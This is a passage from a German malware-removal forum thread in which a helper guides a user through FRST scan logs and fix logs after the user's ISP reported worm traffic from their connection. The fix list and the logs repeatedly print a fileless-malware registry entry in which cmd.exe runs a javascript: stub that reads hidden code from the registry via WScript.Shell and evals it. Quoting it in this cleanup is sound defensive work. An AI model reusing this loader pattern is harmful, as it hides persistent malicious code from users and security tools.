StandardProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI)
StandardProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI)
StandardProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI)
StandardProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI)
StandardProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI)
StandardProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp
StandardProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp
StandardProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp
StandardProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp

==================== Wiederherstellungspunkte =========================

09-08-2017 18:56:47 JRT Pre-Junkware Removal

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.)
Description: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.)
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: (Standard-USB-Hostcontroller)
Service: 
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. 


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (08/09/2017 06:57:01 PM) (Source: ESENT) (EventID: 455) (User: )
Description: SettingSyncHost (8636) {7275B360-D16E-4A63-999E-C1E83CAE2702}: Fehler -1811 (0xfffff8ed) beim Öffnen von Protokolldatei C:\Users\*****\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\edb0001C.log.

Error: (08/09/2017 06:55:36 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/09/2017 06:55:06 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/09/2017 06:33:11 PM) (Source: Windows Search Service) (EventID: 3079) (User: )
Description: Benachrichtigungen für Volume C:\ sind nicht aktiv. 

Kontext: Windows Anwendung

Details:
	Falscher Parameter.  (HRESULT : 0x80070057) (0x80070057)

Error: (08/08/2017 11:12:20 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/08/2017 11:09:20 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/08/2017 07:54:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe_AppReadiness, Version: 10.0.15063.0, Zeitstempel: 0x02799ef5
Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.15063.447, Zeitstempel: 0xa329d3a8
Ausnahmecode: 0xc0000374
Fehleroffset: 0x00000000000f775f
ID des fehlerhaften Prozesses: 0x14c0
Startzeit der fehlerhaften Anwendung: 0x01d3106f677803f8
Pfad der fehlerhaften Anwendung: c:\windows\system32\svchost.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll
Berichtskennung: e32cdd45-cc09-4755-a884-1766a58cffdb
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (08/08/2017 07:28:21 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Die Open-Prozedur für den Dienst "BITS" in der DLL "C:\Windows\System32\bitsperf.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode.

Error: (08/08/2017 06:00:39 PM) (Source: ESENT) (EventID: 455) (User: )
Description: SettingSyncHost (7672) {6A2B0A61-8ED9-4BCE-AD27-3A8AE10CACC4}: Fehler -1811 (0xfffff8ed) beim Öffnen von Protokolldatei C:\Users\*****\AppData\Local\Microsoft\Windows\SettingSync\metastore\edb00025.log.

Error: (08/08/2017 05:58:23 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.


Systemfehler:
=============
Error: (08/09/2017 06:56:58 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "NVIDIA NetworkService Container" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (08/09/2017 06:56:58 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "NVIDIA LocalSystem Container" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 6000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (08/09/2017 06:56:56 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "NVIDIA Display Container LS" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (08/09/2017 06:42:41 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Digital Wave Update Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (08/09/2017 06:40:25 PM) (Source: BugCheck) (EventID: 1001) (User: )
Description: Der Computer wurde nach einem schwerwiegenden Fehler neu gestartet. Der Fehlercode war: 0x00000050 (0xffff8900bc3a2000, 0x0000000000000002, 0xfffff80318b0a846, 0x0000000000000000). Ein volles Abbild wurde gespeichert in: C:\WINDOWS\MEMORY.DMP. Berichts-ID: 7499a157-048c-4741-ae6b-42281a81fc43.

Error: (08/09/2017 06:40:24 PM) (Source: NETLOGON) (EventID: 3095) (User: )
Description: Dieser Computer ist als Mitglied einer Arbeitsgruppe konfiguriert, nicht als
Mitglied einer Domäne. Der Anmeldedienst braucht bei dieser
Konfiguration nicht gestartet zu sein.

Error: (08/09/2017 06:40:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: 
Die Anforderung wird nicht unterstützt.

Error: (08/09/2017 06:40:23 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Das System wurde zuvor am ‎08.‎08.‎2017 um 23:15:03 unerwartet heruntergefahren.

Error: (08/08/2017 11:15:06 PM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON)
Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (08/08/2017 11:15:06 PM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON)
Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.


CodeIntegrity:
===================================
  Date: 2017-07-28 18:15:03.249
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-07-28 18:15:02.562
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-07-05 21:28:31.069
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-20 13:12:31.840
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-06 20:55:49.642
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-20 20:43:22.953
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-20 20:06:11.606
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-19 20:40:43.841
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-19 20:18:44.959
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-5820K CPU @ 3.30GHz
Prozentuale Nutzung des RAM: 19%
Installierter physikalischer RAM: 16279.21 MB
Verfügbarer physikalischer RAM: 13118.89 MB
Summe virtueller Speicher: 18711.21 MB
Verfügbarer virtueller Speicher: 14960.39 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.69 GB) (Free:75.21 GB) NTFS
Drive f: (Volume) (Fixed) (Total:3725.96 GB) (Free:3665.1 GB) NTFS
Drive g: (Volume) (Fixed) (Total:3725.96 GB) (Free:2787.59 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: BE291492)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=449 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7452 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt ============================
         

Alt 09.08.2017, 22:07   #29
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

UPC meldet: Virus, würmer werden über meine IP versendet



FRST-Fix

Virenscanner jetzt bitte komplett deaktivieren, damit sichergestellt ist, dass der Fix sauber durchläuft!


Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
ATTFilter
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\Program Files (x86)\IObit
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://search.avira.net/#web/result?source=art&q=
FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01]
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
emptytemp:
         

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 10.08.2017, 17:13   #30
Lost_Viking
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

UPC meldet: Virus, würmer werden über meine IP versendet



hmm das Programm wurde von Windows Frühzeitig abgewürgt.
Ich probiers gleich nochmal


Edit: Hmm kann den Windows Defender seit neustem Update nicht mehr ausschalten....interesssant ....vielleicht wurde deswegen die Operation abgebrochen


Code:
ATTFilter
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-08-2017
durchgeführt von Martin333 (10-08-2017 17:45:04) Run:1
Gestartet von C:\Users\Martin ***\Desktop
Geladene Profile: Martin *** (Verfügbare Profile: Martin**)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschr�nkung <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschr�nkung <==== ACHTUNG
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\Program Files (x86)\IObit
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://search.avira.net/#web/result?source=art&q=
FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01]
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
emptytemp:
         
*****************

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => Schlüssel erfolgreich entfernt
"C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG" => nicht gefunden.
C:\Program Files (x86)\IObit => erfolgreich verschoben
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com => nicht gefunden.
HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.0 => Schlüssel erfolgreich entfernt
HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.1 => Schlüssel erfolgreich entfernt
RegLink Found. Source: "" => Target: "HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\ => Schlüssel erfolgreich entfernt
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas => Schlüssel nicht gefunden. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{057EAF51-6043-4A2C-8C62-FA5066DFA7DE} => Schlüssel konnte nicht entfernt werden. Zugriff verweigert.
         
Ok Problem gelöst. Anscheinend hat Windows defender einen Neustart gebraucht. Habe ihn anschliessend ausschalten können.

hier der Restlog:
Code:
ATTFilter
Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 10-08-2017 18:07:14)


Ergebnis der geplanten Schlüssel-Entfernung nach dem Neustart:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{057EAF51-6043-4A2C-8C62-FA5066DFA7DE} => Schlüssel erfolgreich entfernt

==== Ende vom Fixlog 18:07:14 ====
         
Hier das Log nach erfolgreicher Anwendung und Neustart:

Code:
ATTFilter
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-08-2017
durchgeführt von Martin **** (10-08-2017 18:09:56) Run:2
Gestartet von C:\Users\Martin**\Desktop
Geladene Profile: Martin****(Verfügbare Profile: Martin 33)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschr�nkung <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschr�nkung <==== ACHTUNG
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\Program Files (x86)\IObit
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://search.avira.net/#web/result?source=art&q=
FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01]
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
emptytemp:
         
*****************

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => Schlüssel konnte nicht entfernt werden, Schlüssel könnte geschützt sein
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => Schlüssel nicht gefunden. 
"C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG" => nicht gefunden.
"C:\Program Files (x86)\IObit" => nicht gefunden.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com => nicht gefunden.
HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.0 => Schlüssel nicht gefunden. 
HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.1 => Schlüssel nicht gefunden. 
RegLink Found. Source: "" => Target: "HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\ => Schlüssel erfolgreich entfernt
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas => Schlüssel nicht gefunden. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{057EAF51-6043-4A2C-8C62-FA5066DFA7DE} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{189B4981-5161-4573-95FB-914ABF5857A2} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{189B4981-5161-4573-95FB-914ABF5857A2} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C71CB98-75B2-4838-9B99-8BB2257CEC5B} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C71CB98-75B2-4838-9B99-8BB2257CEC5B} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{41006DFD-D327-4048-9208-BB616205BF64} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{41006DFD-D327-4048-9208-BB616205BF64} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{43681C05-5E15-43E2-93BB-8585D47F91E4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{43681C05-5E15-43E2-93BB-8585D47F91E4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{54193568-FA18-42AA-AA36-72AE0A69F1CE} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{54193568-FA18-42AA-AA36-72AE0A69F1CE} => Schlüssel erfolgreich entfernt
